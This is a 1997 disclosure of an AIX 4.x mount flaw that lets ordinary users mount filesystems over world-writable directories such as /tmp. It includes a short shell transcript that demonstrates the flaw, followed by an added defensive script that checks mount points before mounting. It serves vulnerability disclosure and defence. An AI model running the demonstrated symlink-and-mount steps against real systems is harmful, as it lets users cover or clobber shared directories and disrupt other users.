Description: AIX mount has a serious problem that allows people to mount any filesystem on top of any writeable space.
Author: "S. Ryan Quick" <ryan@PHAEDO.COM>
Compromise: Mount filesystems on top of any writeable space (this could allow you to clobber files, among other things).
Vulnerable Systems: AIX 4.1.3, 4.1.4, 4.2.0, 4.2.1
Date: 28 December 1997

Date: Sun, 28 Dec 1997 22:26:17 -0500
From: "S. Ryan Quick" <ryan@PHAEDO.COM>
Subject: AIX 4.x Mount
-----BEGIN PGP SIGNED MESSAGE-----
My apologies if this is known already . . . however, I've seen nothing about
it and it does concern me. I have verified a problem with mount on AIX 4.1.3,
4.1.4, 4.2.0, and 4.2.1 which allows a normal user to mount any filesystem
(including those already mounted by the system) on top of any writable
space. Immediately, as the script below shows, this allows a user to
overwrite the contents of 777 directories with whatever files one wants.
(e.g. Removing access to temporary files in /tmp) . . .
sapphire /home/rquick > oslevel
sapphire /home/rquick > who am i
sapphire /home/rquick > id
sapphire /home/rquick > ln -s /tmp mnt
sapphire /home/rquick > mount /usr mnt
sapphire /home/rquick > cd /tmp
sapphire /tmp > ls
OV dict include lpd sbin ucb
adm dt lbin lpp share usg
bin ebt lib man spool
ccs eligibility local pub sys
common etc lost+found samples tmp
sapphire /tmp > cd
sapphire /home/rquick > umount mnt
sapphire /home/rquick >
I have notified IBM of the problem . . . they have yet to respond.
S. Ryan Quick
UNIX Systems Engineer
Phaedo Consulting, Inc.
-----BEGIN PGP SIGNATURE-----
-----END PGP SIGNATURE-----
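
One way a mount front end could validate a user-supplied mount point before acting on it, shown as an added example (it is not from the original post and is not IBM's fix). The policy, that the symlink-resolved directory must be owned by the caller and must not be world-writable, and the function names `resolve_dir` and `check_mountpoint` are assumptions.

```shell
#!/bin/sh
# Added example: a pre-mount policy check for a user-supplied mount point.
# Assumed policy (not IBM's fix): after resolving symlinks, the directory
# must be owned by the caller and must not be world-writable.

# Print the physical path of directory $1 with every symlink resolved.
resolve_dir() {
    case "$1" in /*) p=$1 ;; *) p=./$1 ;; esac
    ( cd -P "$p" 2>/dev/null && pwd -P )
}

# Return 0 and print "ok" if the caller may mount over $1; else explain, return 1.
check_mountpoint() {
    real=$(resolve_dir "$1") || { echo "refuse: $1 is not a directory"; return 1; }
    # Numeric owner of the resolved directory (field 3 of ls -ldn).
    owner=$(ls -ldn "$real" | awk '{print $3}')
    if [ "$owner" != "$(id -u)" ]; then
        echo "refuse: $real is owned by uid $owner, not the caller"; return 1
    fi
    # Shared, /tmp-style directories must never be covered by a user mount.
    if [ -n "$(find "$real" -prune -perm -0002)" ]; then
        echo "refuse: $real is world-writable"; return 1
    fi
    echo "ok: $real"
}

# Constructed demo in a scratch directory: "shared" stands in for /tmp and
# "mnt" is the symlink from the post's transcript (ln -s /tmp mnt).
work=$(mktemp -d)
mkdir "$work/shared" "$work/private"
chmod 777 "$work/shared"; chmod 755 "$work/private"
ln -s "$work/shared" "$work/mnt"
check_mountpoint "$work/mnt" || true      # refused: resolves to the 777 directory
check_mountpoint "$work/private" || true  # accepted: caller-owned, not shared
rm -rf "$work"
```

A check like this only has force inside the privileged mount code, applied to the resolved directory at mount time; run from a separate wrapper beforehand, the path can change between the check and the mount.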